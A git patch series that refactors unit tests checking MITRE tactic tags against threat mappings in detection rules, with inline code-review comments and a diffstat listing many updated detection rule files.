From 12fe443e72fcb9fa0f6d4287f925824834fe0232 Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Mon, 23 Mar 2026 16:56:45 -0500 Subject: [PATCH 01/16] update tag & tacit unit test --- tests/test_all_rules.py | 118 +++++++++++++++++++++------------------- 1 file changed, 61 insertions(+), 57 deletions(-) diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py index 584b6fba1cf..2aef99982dc 100644 --- a/tests/test_all_rules.py +++ b/tests/test_all_rules.py @@ -11,6 +11,7 @@ import uuid from collections import defaultdict from pathlib import Path +from typing import Any import eql import kql @@ -43,6 +44,39 @@ PACKAGE_STACK_VERSION = Version.parse(current_stack_version(), optional_minor_and_patch=True) +def _flat_threat_tactic_names(threat: list[Any]) -> list[str]: + """Tactic display names from ``rule.threat`` in encounter order (may repeat).""" + names: list[str] = [] + for entry in threat: + tactic = getattr(entry, "tactic", None) + if tactic is None: + continue + raw = getattr(tactic, "name", None) + if raw: + names.append(str(raw)) + return names + + +def _mitre_tactic_tag_gaps( + rule_tags: list[str], + threat_tactic_names: list[str], + attack_tactics_set: set[str], + *, + prefix: str = "Tactic: ", +) -> tuple[list[str], list[str]]: + """``(missing Tactic tags, orphan MITRE tactic names on tags)``.""" + unique_names = list(dict.fromkeys(threat_tactic_names)) + missing = [f"{prefix}{name}" for name in unique_names if f"{prefix}{name}" not in rule_tags] + tagged_mitre: list[str] = [] + for t in rule_tags: + if isinstance(t, str) and t.startswith(prefix): + suffix = t.removeprefix(prefix).strip() + if suffix in attack_tactics_set: + tagged_mitre.append(suffix) + unexpected = [n for n in tagged_mitre if n not in threat_tactic_names] + return missing, unexpected + + class TestValidRules(BaseRuleTest): """Test that all detection rules load properly without duplicates.""" 
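Review bot: `_mitre_tactic_tag_gaps` builds `missing` from every name in `threat_tactic_names` but filters `unexpected` through `attack_tactics_set`, so a tactic from a non-ATT&CK framework (the next hunk shows `t.framework` can differ per entry) is demanded as a `Tactic: ` tag while such a tag would never be reported as unexpected. If only ATT&CK tactics are meant to be tagged, restrict the first list too: `unique_names = [n for n in dict.fromkeys(threat_tactic_names) if n in attack_tactics_set]`; if every framework's tactic must be tagged, the docstring should say so, because the hunk-3 docstring currently claims the check is about ATT&CK. The tag side also `.strip()`s the suffix while `missing` requires an exact `f"{prefix}{name}"` match, so a tag with stray whitespace is reported as missing rather than normalised; one treatment should apply to both directions.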
@@ -363,16 +397,16 @@ def test_tactic_to_technique_correlations(self): ) def test_duplicated_tactics(self): - """Check that a tactic is only defined once.""" + """Check that a tactic is only defined once per framework (ATT&CK vs ATLAS may share display names).""" for rule in self.all_rules: threat_mapping = rule.contents.data.threat - tactics = [t.tactic.name for t in threat_mapping or []] - duplicates = sorted({t for t in tactics if tactics.count(t) > 1}) + pairs = [(t.framework, t.tactic.name) for t in threat_mapping or []] + duplicates = sorted({p for p in pairs if pairs.count(p) > 1}) if duplicates: self.fail( f"{self.rule_str(rule)} duplicate tactics defined for {duplicates}. " - f"Flatten to a single entry per tactic" + f"Flatten to a single entry per tactic within each framework" ) 
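Review bot: `pairs.count(p)` inside the set comprehension rescans the list for every entry; `collections.Counter` (the module is already imported for `defaultdict`) yields the same duplicates in one pass: `duplicates = sorted(p for p, count in Counter(pairs).items() if count > 1)`. Rule threat lists are short, so this is a readability point rather than a performance one. `Counter` would need adding to the existing `from collections import defaultdict` line, which is outside this hunk.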
@@ -470,45 +504,42 @@ def test_bbr_tags(self): error_rules = "\n".join(invalid_bbr_rules) self.fail(f"The following building block rule(s) have missing tag: Rule Type: BBR:\n{error_rules}") - def test_primary_tactic_as_tag(self): - """Test that the primary tactic is present as a tag.""" - from detection_rules.attack import tactics + def test_threat_tactics_have_matching_tags(self): + """MITRE ATT&CK tactics in ``rule.threat`` must match ``Tactic: `` tags (and vice versa for ATT&CK names). + + Replaces the legacy check that tied the rule filename prefix to the first tactic tag. + """ + from detection_rules.attack import tactics as attack_tactic_names + prefix = "Tactic: " + attack_tactics_set = set(attack_tactic_names) invalid = [] - tactics = set(tactics) for rule in self.all_rules: - rule_tags = rule.contents.data.tags + rule_tags = rule.contents.data.tags or [] if "Continuous Monitoring" in rule_tags or rule.contents.data.type == "machine_learning": continue threat = rule.contents.data.threat - if threat: - missing = [] - threat_tactic_names = [e.tactic.name for e in threat] - primary_tactic = f"Tactic: {threat_tactic_names[0]}" - - # missing primary tactic - if primary_tactic not in rule.contents.data.tags: - missing.append(primary_tactic) - - # listed tactic that is not in threat mapping - tag_tactics = set(rule_tags).intersection(tactics) - missing_from_threat = list(tag_tactics.difference(threat_tactic_names)) + if not threat: + continue - if missing or missing_from_threat: - err_msg = self.rule_str(rule) - if missing: - err_msg += f"\n expected: {missing}" - if missing_from_threat: - err_msg += f"\n unexpected (or missing from threat mapping): {missing_from_threat}" + threat_tactic_names = _flat_threat_tactic_names(threat) + missing, unexpected = _mitre_tactic_tag_gaps( + rule_tags, threat_tactic_names, attack_tactics_set, prefix=prefix + ) - invalid.append(err_msg) + if missing or unexpected: + err_msg = self.rule_str(rule) + if missing: + err_msg += f"\n 
expected: {missing}" + if unexpected: + err_msg += f"\n unexpected (or missing from threat mapping): {unexpected}" + invalid.append(err_msg) if invalid: - err_msg = "\n".join(invalid) - self.fail(f"Rules with misaligned tags and tactics:\n{err_msg}") + self.fail("Rules with misaligned tactic tags and threat mapping:\n" + "\n".join(invalid)) def test_os_tags(self): """Test that OS tags are present within rules.""" @@ -624,33 +655,6 @@ def test_timeline_has_title(self): class TestRuleFiles(BaseRuleTest): """Test the expected file names.""" - def test_rule_file_name_tactic(self): - """Test to ensure rule files have the primary tactic prepended to the filename.""" - bad_name_rules = [] - - for rule in self.all_rules: - rule_path = rule.path.resolve() - filename = rule_path.name - - # machine learning jobs should be in rules/ml or rules/integrations/ - if rule.contents.data.type == definitions.MACHINE_LEARNING: - continue - - threat = rule.contents.data.threat - authors = rule.contents.data.author - - if threat and "Elastic" in authors: - primary_tactic = threat[0].tactic.name - tactic_str = primary_tactic.lower().replace(" ", "_") - - if tactic_str != filename[: len(tactic_str)]: - bad_name_rules.append(f"{rule.id} - {Path(rule.path).name} -> expected: {tactic_str}") - - if bad_name_rules: - error_msg = "filename does not start with the primary tactic - update the tactic or the rule filename" - rule_err_str = "\n".join(bad_name_rules) - self.fail(f"{error_msg}:\n{rule_err_str}") - def test_bbr_in_correct_dir(self): """Ensure that BBR are in the correct directory.""" for rule in self.bbr: From 856a23bc510ea73bc5a865caa331d2f183e66cd4 Mon Sep 17 00:00:00 2001 
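Review bot: The second paragraph of the new docstring says the method replaces a check that tied the rule filename prefix to the first tactic tag, but the test removed in this hunk is `test_primary_tactic_as_tag`, which required the first `rule.threat` tactic to be present as a tag; the filename-prefix check is `test_rule_file_name_tactic`, deleted in the last hunk of this file. The docstring also does not state that the requirement widened from the first tactic to every tactic in `rule.threat`, which is the behavioural change rule authors will notice when the test fails. Suggested wording for the two lines: `Every tactic in rule.threat must appear as a "Tactic: " tag, and every ATT&CK "Tactic: " tag must appear in rule.threat.` followed by `Replaces test_primary_tactic_as_tag, which only required the first threat tactic to be tagged.`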
From: Mika Ayenson Date: Mon, 23 Mar 2026 16:57:14 -0500 Subject: [PATCH 02/16] add updated rules with tags/mitre mappings --- rules/apm/apm_403_response_to_a_post.toml | 16 ++- .../apm_405_response_method_not_allowed.toml | 16 ++- rules/apm/apm_sqlmap_user_agent.toml | 21 ++- ...mmand_and_control_common_llm_endpoint.toml | 24 ++-- ...rol_curl_wget_spawn_via_nodejs_parent.toml | 23 ++-- ...nai_process_suspicious_tld_connection.toml | 10 +- ..._control_genai_process_unusual_domain.toml | 18 ++- ...nd_control_suricata_elastic_defend_c2.toml | 9 +- .../command_and_control_tunnel_qemu.toml | 11 +- ...s_genai_process_sensitive_file_access.toml | 57 ++++---- .../credential_access_gitleaks_execution.toml | 16 +-- ...redential_access_trufflehog_execution.toml | 16 +-- ...e_evasion_deleting_websvr_access_logs.toml | 8 +- ..._evasion_encoding_rot13_python_script.toml | 13 +- ...nse_evasion_genai_config_modification.toml | 36 ++--- ...n_genai_process_compiling_executables.toml | 43 ++---- ...ss_encoding_prior_to_network_activity.toml | 46 ++++--- ...se_evasion_missing_events_after_alert.toml | 36 +---- ...asion_whitespace_padding_command_line.toml | 40 +----- ...y_virtual_machine_fingerprinting_grep.toml | 42 ++++-- ..._server_local_file_inclusion_activity.toml | 39 +++--- ...server_remote_file_inclusion_activity.toml | 35 ++--- .../execution_aws_ec2_lolbin_via_ssm.toml | 44 ++----- ...rnetes_api_request_by_usual_utilities.toml | 32 +---- ...ct_interactive_kubernetes_api_request.toml | 32 +---- ...tes_api_activity_by_unusual_utilities.toml | 34 ++--- ...ss_followed_by_kubernetes_api_request.toml | 50 ++----- .../execution_git_exploit_cve_2025_48384.toml | 28 ++-- ..._pre_or_post_install_script_execution.toml | 52 +------- ...xecution_openclaw_agent_child_process.toml | 64 ++++----- ...on_pentest_eggshell_remote_admin_tool.toml | 20 +-- ...otential_widespread_malware_infection.toml | 20 +-- ...ontainer_creation_with_host_reference.toml | 27 +--- 
...cution_register_github_actions_runner.toml | 60 +++------ .../execution_revershell_via_shell_cmd.toml | 31 +++-- .../execution_sap_netweaver_jsp_webshell.toml | 39 ++---- ...execution_sap_netweaver_webshell_exec.toml | 67 +++++++--- ...tion_suspicious_java_netcon_childproc.toml | 40 +++--- .../execution_via_github_actions_runner.toml | 71 +++++----- ...er_tracking_id_tampering_via_env_vars.toml | 70 ++-------- ...t_alert_from_a_process_with_cpu_spike.toml | 9 +- .../impact_alerts_on_host_with_cpu_spike.toml | 12 +- ..._access_azure_o365_with_network_alert.toml | 41 +++--- ...defend_alert_genai_utility_descendant.toml | 17 +-- ...ccess_execution_susp_react_serv_child.toml | 29 ++-- ...s_exfiltration_new_usb_device_mounted.toml | 29 +--- ..._ssl_vpn_login_followed_by_siem_alert.toml | 9 +- ...ial_access_ollama_api_external_access.toml | 30 ++--- ..._access_zoom_meeting_with_no_passcode.toml | 15 +-- ...tiple_alerts_by_host_ip_and_source_ip.toml | 16 ++- ...erts_email_elastic_defend_correlation.toml | 25 ++-- ...le_alerts_llm_compromised_user_triage.toml | 23 ++-- ...ence_ssh_authorized_keys_modification.toml | 42 +----- ...eb_server_potential_command_injection.toml | 76 ++--------- ...lege_escalation_echo_nopasswd_sudoers.toml | 31 +++-- ...ation_setuid_setgid_bit_set_via_chmod.toml | 34 ++--- .../privilege_escalation_trap_execution.toml | 20 +-- ..._server_discovery_or_fuzzing_activity.toml | 7 +- ...eb_server_unusual_spike_in_error_logs.toml | 7 +- ...unusual_spike_in_error_response_codes.toml | 7 +- ...ssance_web_server_unusual_user_agents.toml | 33 +---- ...collection_cloudtrail_logging_created.toml | 30 ++--- ...nticated_bucket_access_by_rare_source.toml | 22 +--- ...cess_aws_getpassword_for_ec2_instance.toml | 10 +- ...ial_access_iam_user_addition_to_group.toml | 31 ++--- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 13 +- ..._evasion_cloudtrail_logging_suspended.toml | 13 +- 
...nse_evasion_cloudwatch_alarm_deletion.toml | 12 +- ..._evasion_config_service_rule_deletion.toml | 12 +- ...vasion_configuration_recorder_stopped.toml | 12 +- ...ion_ec2_serial_console_access_enabled.toml | 39 +++--- ...defense_evasion_rds_instance_restored.toml | 35 +++-- ...sion_s3_bucket_configuration_deletion.toml | 16 +-- ..._s3_bucket_lifecycle_expiration_added.toml | 37 +----- .../aws/defense_evasion_sqs_purge_queue.toml | 33 ++--- ...ense_evasion_sts_get_federation_token.toml | 31 +---- ...ec2_userdata_request_for_ec2_instance.toml | 22 +--- ...eration_via_update_assume_role_policy.toml | 30 +---- ...iscovery_ssm_inventory_reconnaissance.toml | 10 +- ...mbda_external_layer_added_to_function.toml | 33 +++-- ..._new_terms_cloudformation_createstack.toml | 10 +- ...tration_dynamodb_scan_by_unusual_user.toml | 25 +--- .../aws/exfiltration_ec2_export_task.toml | 47 ++----- ..._full_network_packet_capture_detected.toml | 43 +----- .../aws/exfiltration_rds_snapshot_export.toml | 28 ++-- ...icy_added_for_external_account_access.toml | 38 ++---- ...bucket_policy_added_for_public_access.toml | 38 ++---- ...ns_rare_protocol_subscription_by_user.toml | 46 +------ ..._eventbridge_rule_disabled_or_deleted.toml | 26 ++-- ..._s3_bucket_enumeration_or_brute_force.toml | 39 +----- .../impact_cloudtrail_logging_updated.toml | 45 ++----- .../impact_cloudwatch_log_group_deletion.toml | 34 +---- ...impact_cloudwatch_log_stream_deletion.toml | 34 +---- .../impact_ec2_disable_ebs_encryption.toml | 34 ++--- ...mpact_ec2_ebs_snapshot_access_removed.toml | 8 +- .../aws/impact_iam_deactivate_mfa_device.toml | 36 +++-- ..._cluster_deletion_protection_disabled.toml | 27 ++-- .../aws/impact_rds_snapshot_deleted.toml | 11 +- ...t_object_uploaded_with_ransom_keyword.toml | 18 +-- .../initial_access_console_login_root.toml | 31 +---- .../aws/initial_access_password_recovery.toml | 15 +-- ...tance_connect_ssh_public_key_uploaded.toml | 39 +----- 
...l_movement_ec2_instance_console_login.toml | 75 +++-------- ...ns_topic_message_publish_by_rare_user.toml | 44 +------ .../ml_cloudtrail_error_message_spike.toml | 36 +---- .../aws/ml_cloudtrail_rare_error_code.toml | 60 +-------- .../ml_cloudtrail_rare_method_by_city.toml | 20 +-- .../ml_cloudtrail_rare_method_by_country.toml | 20 +-- .../ml_cloudtrail_rare_method_by_user.toml | 57 +------- ...ttempt_to_register_virtual_mfa_device.toml | 17 +-- .../persistence_ec2_network_acl_creation.toml | 27 +--- ...e_ec2_route_table_modified_or_deleted.toml | 29 ++-- ..._group_configuration_change_detection.toml | 23 +--- ..._iam_api_calls_via_user_session_token.toml | 32 ++--- ...nce_iam_create_login_profile_for_root.toml | 16 +-- .../aws/persistence_iam_group_creation.toml | 16 +-- ...persistence_iam_oidc_provider_created.toml | 32 +---- ...ce_iam_roles_anywhere_profile_created.toml | 33 +++-- ...usted_anchor_created_with_external_ca.toml | 13 +- ...persistence_iam_saml_provider_created.toml | 31 ++--- ...oor_invoke_function_for_any_principal.toml | 30 ++--- ...nce_rds_db_instance_password_modified.toml | 35 ++--- .../persistence_rds_instance_made_public.toml | 32 ++--- ...oute_53_domain_transfer_lock_disabled.toml | 33 ++--- ...domain_transferred_to_another_account.toml | 28 +--- ..._53_hosted_zone_associated_with_a_vpc.toml | 46 ++----- .../aws/persistence_route_table_created.toml | 29 ++-- ...e_sensitive_operations_via_cloudshell.toml | 27 +++- ...sistence_sts_assume_role_with_new_mfa.toml | 58 +++----- ...tratoraccess_policy_attached_to_group.toml | 24 ++-- ...stratoraccess_policy_attached_to_role.toml | 24 ++-- ...stratoraccess_policy_attached_to_user.toml | 30 ++--- ...tomer_managed_policy_attached_to_role.toml | 35 +++-- ..._escalation_iam_saml_provider_updated.toml | 31 +++-- ...alation_iam_update_assume_role_policy.toml | 43 +++--- ...escalation_role_assumption_by_service.toml | 42 ++---- ...ge_escalation_role_assumption_by_user.toml | 36 +---- 
...oot_from_rare_user_and_member_account.toml | 24 +--- ...rivilege_escalation_sts_role_chaining.toml | 62 ++++----- ...opment_sns_topic_created_by_rare_user.toml | 27 +--- ..._bedrock_execution_without_guardrails.toml | 50 +++++-- ...ls_multiple_violations_by_single_user.toml | 24 ++-- ...multiple_violations_in_single_request.toml | 24 ++-- ...confidence_misconduct_blocks_detected.toml | 24 ++-- ...k_high_resource_consumption_detection.toml | 82 ++++++++++-- ...attempts_to_use_denied_models_by_user.toml | 24 ++-- ...ve_information_policy_blocks_detected.toml | 24 ++-- ...multiple_topic_policy_blocks_detected.toml | 24 ++-- ...ation_exception_errors_by_single_user.toml | 26 ++-- ..._multiple_word_policy_blocks_detected.toml | 29 ++-- ...point_access_from_unusual_application.toml | 21 ++- ...ss_by_unusual_public_client_via_graph.toml | 8 +- ...s_azure_entra_susp_device_code_signin.toml | 21 +-- ...s_azure_storage_account_keys_accessed.toml | 31 +---- ...s_entra_id_excessive_account_lockouts.toml | 17 +-- ...ial_access_entra_id_suspicious_signin.toml | 39 +++--- ...ss_entra_id_totp_brute_force_attempts.toml | 10 +- ..._access_key_vault_excessive_retrieval.toml | 33 ++--- ...ccess_storage_account_key_regenerated.toml | 28 +--- ...se_evasion_automation_runbook_deleted.toml | 21 ++- ...insights_diagnostic_settings_deletion.toml | 10 +- ...nse_evasion_kubernetes_events_deleted.toml | 16 +-- ...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...overy_bloodhound_user_agents_detected.toml | 24 +--- ...d_teamfiltration_user_agents_detected.toml | 82 ++++-------- ...ge_blob_container_access_modification.toml | 29 +--- ...torage_blob_download_azcopy_sas_token.toml | 33 ++--- ...ct_azure_compute_vm_snapshot_deletion.toml | 8 +- ...t_azure_compute_vm_snapshot_deletions.toml | 8 +- ...impact_azure_storage_account_deletion.toml | 10 +- ...ure_storage_account_deletion_multiple.toml | 10 +- 
...ct_key_vault_modified_by_unusual_user.toml | 10 +- .../azure/impact_kubernetes_pod_deleted.toml | 10 +- ...act_resources_resource_group_deletion.toml | 22 +--- ...ster_credential_access_unusual_source.toml | 38 +++--- ..._actor_token_user_impersonation_abuse.toml | 48 ++----- ...d_device_code_auth_with_broker_client.toml | 51 +++---- ...s_entra_id_external_guest_user_invite.toml | 26 ++-- ..._id_federated_login_by_unusual_client.toml | 51 +++---- ...a_id_first_time_seen_device_code_auth.toml | 21 +-- ...ingle_session_from_multiple_addresses.toml | 41 +----- ...sent_grant_via_registered_application.toml | 47 +++---- ..._code_grant_unusual_app_resource_user.toml | 42 +++--- ...via_first_party_microsoft_application.toml | 46 ++----- ...tra_id_oauth_user_impersonation_scope.toml | 29 +--- ...ial_access_entra_id_powershell_signin.toml | 24 +--- ...a_id_protection_sign_in_risk_detected.toml | 57 ++------ ...ntra_id_protection_user_risk_detected.toml | 43 +----- ...tra_id_rare_app_id_for_principal_auth.toml | 49 ++++--- ...cation_requirement_for_principal_user.toml | 37 +----- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 49 +++---- ...ph_first_occurrence_of_client_request.toml | 41 +++--- .../azure/ml_azure_event_failures.toml | 33 ++--- .../azure/ml_azure_rare_event_failures.toml | 60 +-------- .../azure/ml_azure_rare_method_by_city.toml | 21 +-- .../ml_azure_rare_method_by_country.toml | 21 +-- .../azure/ml_azure_rare_method_by_user.toml | 61 +++------ ...ersistence_automation_account_created.toml | 23 +--- ...ersistence_automation_webhook_created.toml | 15 +-- ...id_conditional_access_policy_modified.toml | 32 +++-- ...id_global_administrator_role_assigned.toml | 34 +++-- ...stence_entra_id_mfa_disabled_for_user.toml | 32 +++-- ..._entra_id_pim_user_added_global_admin.toml | 24 +++- ...ged_identity_management_role_modified.toml | 44 +++---- ...rt_to_prt_transition_from_user_device.toml | 40 +----- ...d_service_principal_credentials_added.toml | 32 +++-- 
...e_principal_federated_issuer_modified.toml | 36 +---- ...nant_domain_federation_via_audit_logs.toml | 47 +++---- ..._added_as_owner_for_azure_application.toml | 22 ++-- ..._as_owner_for_azure_service_principal.toml | 33 +++-- ...id_user_signed_in_from_unusual_device.toml | 49 +++---- ...sistence_event_hub_created_or_updated.toml | 32 +++-- ...ce_graph_eam_addition_or_modification.toml | 30 ++--- ..._protect_alert_followed_by_device_reg.toml | 13 +- ...ure_rbac_administrator_roles_assigned.toml | 29 ++-- ..._elevate_to_user_administrator_access.toml | 32 +++-- ...on_kubernetes_aks_rolebinding_created.toml | 44 +++---- ...a_id_custom_domain_added_and_verified.toml | 19 +-- ...openai_denial_of_ml_service_detection.toml | 41 ++++-- ...ai_insecure_output_handling_detection.toml | 22 ++-- .../azure_openai_model_theft_detection.toml | 62 +++++++-- .../command_and_control_beaconing.toml | 16 +-- ...and_control_beaconing_high_confidence.toml | 16 +-- ...socks_proxy_detected_inside_container.toml | 8 +- ...teractive_file_download_from_internet.toml | 51 ++----- ...control_tunneling_and_port_forwarding.toml | 7 +- ..._files_compression_inside_a_container.toml | 38 +++--- ...r_passwords_search_inside_a_container.toml | 24 ++-- ...ss_service_account_token_or_cert_read.toml | 7 +- ..._decoded_payload_piped_to_interpreter.toml | 64 ++++----- ...le_creation_execution_deletion_cradle.toml | 35 +++-- ...s_execution_from_suspicious_directory.toml | 49 +++---- ...ed_object_modified_inside_a_container.toml | 29 ++-- ...potential_evasion_via_encoded_payload.toml | 45 +------ .../discovery_dns_enumeration.toml | 12 +- .../discovery_environment_enumeration.toml | 7 +- ...overy_kubelet_certificate_file_access.toml | 28 ++-- ..._enumeration_from_interactive_process.toml | 12 +- ...covery_service_account_namespace_read.toml | 7 +- ...work_tool_launched_inside_a_container.toml | 44 +------ .../discovery_tool_enumeration.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 46 +++---- 
...e_file_creation_followed_by_execution.toml | 31 +---- ...e_creation_in_system_binary_locations.toml | 46 ++----- ...shell_spawned_from_inside_a_container.toml | 7 +- .../execution_kubeletctl_execution.toml | 31 ++--- ...stener_established_inside_a_container.toml | 28 ++-- ...payload_downloaded_and_piped_to_shell.toml | 49 +++---- ...irect_kubelet_access_via_process_args.toml | 41 ++---- ...ecutable_via_chmod_inside_a_container.toml | 25 +--- ...ractive_interpreter_command_execution.toml | 73 +++-------- ...ication_of_persistence_relevant_files.toml | 72 +++------- ..._keys_modification_inside_a_container.toml | 40 +----- ...e_suspicious_echo_or_printf_execution.toml | 108 ++++++++------- ...ous_webserver_child_process_execution.toml | 71 +++++----- ...berarkpas_error_audit_event_promotion.toml | 22 +--- ...commended_events_to_monitor_promotion.toml | 22 +--- ...ration_ml_high_bytes_destination_port.toml | 26 ++-- ...high_bytes_written_to_external_device.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...d_control_ml_dga_high_sum_probability.toml | 8 +- ...istence_suspicious_file_modifications.toml | 124 +++++++++--------- ...collection_gcp_pub_sub_topic_creation.toml | 15 +-- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 26 ++-- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 26 ++-- ...p_storage_bucket_permissions_modified.toml | 45 ++++--- ...virtual_private_cloud_network_deleted.toml | 31 ++--- ...p_virtual_private_cloud_route_created.toml | 19 ++- ...p_virtual_private_cloud_route_deleted.toml | 19 ++- ...tration_gcp_logging_sink_modification.toml | 29 ++-- ...l_access_gcp_iam_custom_role_creation.toml | 47 +++---- .../gcp/ml_gcp_error_message_spike.toml | 33 ++--- 
.../gcp/ml_gcp_rare_error_code.toml | 59 +-------- .../gcp/ml_gcp_rare_method_by_city.toml | 22 +--- .../gcp/ml_gcp_rare_method_by_country.toml | 22 +--- .../gcp/ml_gcp_rare_method_by_user.toml | 57 +------- ..._gcp_iam_service_account_key_deletion.toml | 26 ++-- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- ...hub_protected_branch_settings_changed.toml | 10 +- .../github/execution_github_app_deleted.toml | 25 ++-- ..._high_number_of_cloned_repos_from_pat.toml | 37 +++--- ...multiple_behavior_alerts_from_account.toml | 10 +- .../execution_new_github_app_installed.toml | 25 ++-- ...thub_private_repository_turned_public.toml | 24 +--- ...ration_high_number_of_cloning_by_user.toml | 38 +++--- ...b_repository_activity_from_unusual_ip.toml | 52 ++------ ...umber_of_closed_pull_requests_by_user.toml | 45 ++----- ...protected_branch_force_pushes_by_user.toml | 45 ++----- ...protected_branch_force_pushes_by_user.toml | 42 ++---- ...github_actions_bot_first_push_to_repo.toml | 50 +++---- ...ub_actions_workflow_injection_blocked.toml | 29 +--- ...ss_github_register_self_hosted_runner.toml | 14 +- .../persistence_github_org_owner_added.toml | 44 ++++--- .../github/persistence_new_pat_created.toml | 36 ++--- ...tence_organization_owner_role_granted.toml | 32 +++-- ...ship_transferred_via_google_workspace.toml | 29 ++-- ...yption_key_accessed_by_anonymous_user.toml | 28 ++-- ...ed_from_blocklist_in_google_workspace.toml | 16 +-- ...d_to_google_workspace_trusted_domains.toml | 16 +-- ...marketplace_modified_to_allow_any_app.toml | 16 +-- ...le_workspace_mfa_enforcement_disabled.toml | 44 +++++-- ..._user_added_to_google_workspace_group.toml | 30 ++--- ...ogle_workspace_suspended_user_renewed.toml | 24 ++-- ...ed_to_external_drive_with_app_consent.toml | 41 +++--- ...tion_added_to_google_workspace_domain.toml | 8 +- ..._google_workspace_2sv_policy_disabled.toml | 34 +++-- ...workspace_admin_role_assigned_to_user.toml | 
31 +++-- ...e_workspace_custom_admin_role_created.toml | 32 +++-- ...le_workspace_password_policy_modified.toml | 25 ++-- ...stence_google_workspace_role_modified.toml | 32 +++-- ...pace_user_organizational_unit_changed.toml | 31 +++-- ...led_for_google_workspace_organization.toml | 34 +++-- ...ure_arc_proxy_secret_configmap_access.toml | 35 +++-- .../defense_evasion_events_deleted.toml | 7 +- ...covery_denied_service_account_request.toml | 29 ++-- ...covery_suspicious_self_subject_review.toml | 8 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 21 ++- ...bidden_request_from_unsual_user_agent.toml | 22 ++-- ...nusual_request_response_by_user_agent.toml | 23 ++-- ...l_access_anonymous_request_authorized.toml | 12 +- ...ed_service_created_with_type_nodeport.toml | 18 ++- ...ted_with_excessive_linux_capabilities.toml | 26 ++-- ...e_escalation_pod_created_with_hostipc.toml | 26 ++-- ...calation_pod_created_with_hostnetwork.toml | 26 ++-- ...e_escalation_pod_created_with_hostpid.toml | 26 ++-- ...reated_with_sensitive_hostpath_volume.toml | 26 ++-- ...ege_escalation_privileged_pod_created.toml | 26 ++-- ...nge_followed_by_workload_modification.toml | 36 ++--- ...e_workload_modification_by_user_agent.toml | 49 ++----- ..._service_account_rbac_write_operation.toml | 14 +- ...ignment_of_controller_service_account.toml | 20 ++- ...ovement_ml_high_mean_rdp_process_args.toml | 35 +++-- ...ent_ml_high_mean_rdp_session_duration.toml | 14 +- ...ral_movement_ml_high_remote_file_size.toml | 11 +- ...ml_high_variance_rdp_session_duration.toml | 14 +- ...ovement_ml_rare_remote_file_directory.toml | 11 +- ...ovement_ml_rare_remote_file_extension.toml | 11 +- ...spike_in_connections_from_a_source_ip.toml | 14 +- ...ke_in_connections_to_a_destination_ip.toml | 14 +- ...al_movement_ml_spike_in_rdp_processes.toml | 14 +- ...ent_ml_spike_in_remote_file_transfers.toml | 30 +++-- ...nt_ml_unusual_time_for_an_rdp_session.toml | 14 +- 
...ion_onedrive_excessive_file_downloads.toml | 24 +--- ...arepoint_file_download_via_powershell.toml | 25 +--- ...a_id_device_reg_via_oauth_redirection.toml | 37 +----- ...access_identity_user_account_lockouts.toml | 15 +-- ...on_entra_id_susp_oauth2_authorization.toml | 36 +---- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- ...ange_mailbox_audit_bypass_association.toml | 11 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 8 +- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...on_sharepoint_sharing_policy_weakened.toml | 14 +- ..._teams_custom_app_interaction_allowed.toml | 11 +- ...evasion_teams_external_access_enabled.toml | 11 +- ...very_sharepoint_sensitive_term_search.toml | 32 +---- ...tion_exchange_transport_rule_creation.toml | 22 ++-- ..._exchange_transport_rule_modification.toml | 22 ++-- ...sent_grant_via_registered_application.toml | 42 ++---- ...via_first_party_microsoft_application.toml | 34 ++--- ..._identity_unusual_sso_errors_for_user.toml | 38 ++---- ...ompliance_user_reported_phish_malware.toml | 15 +-- ...ce_user_restricted_from_sending_email.toml | 10 +- ...al_movement_onedrive_malware_uploaded.toml | 21 +-- ..._movement_sharepoint_malware_uploaded.toml | 21 +-- ...a_id_global_administrator_role_assign.toml | 34 +++-- ...e_exchange_management_role_assignment.toml | 30 +++-- ...picious_mailbox_permission_delegation.toml | 34 +++-- ...nge_new_or_modified_federation_domain.toml | 43 ++++-- ...harepoint_site_collection_admin_added.toml | 20 +-- ...l_access_attempted_bypass_of_okta_mfa.toml | 37 ++++-- ...mpts_to_brute_force_okta_user_account.toml | 8 +- ...vents_from_single_device_behind_proxy.toml | 18 +-- ..._token_hashes_for_single_okta_session.toml | 29 ++-- ...multiple_user_agent_os_authentication.toml | 29 ++-- ...ccess_okta_aitm_session_cookie_replay.toml | 33 +++-- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- 
